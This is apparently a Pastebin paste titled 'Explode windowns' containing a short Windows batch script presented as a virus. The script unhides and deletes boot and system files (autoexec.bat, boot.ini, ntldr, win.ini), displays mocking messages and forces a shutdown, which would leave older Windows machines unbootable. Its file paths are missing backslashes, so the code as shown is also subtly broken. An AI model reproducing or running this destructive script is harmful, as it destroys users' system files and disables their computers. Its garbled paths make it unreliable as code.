JackHaxor

Explode windowns

May 14th, 2017
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.29 KB | None | 0 0
  1. @echo off
  2. msg *virus activated*
  3. attrib -r -s -h c:autoexec.bat
  4. del c:autoexec.bat
  5. attrib -r -s -h c:boot.ini
  6. del c:boot.ini
  7. attrib -r -s -h c:ntldr
  8. del c:ntldr
  9. attrib -r -s -h c:windowswin.ini
  10. del c:windowswin.ini
  11. @echo off
  12. msg *Computer Over. Virus=Very Yes.*
  13. shutdown -s -t 10 -c " "
Advertisement
Add Comment
Please, Sign In to add comment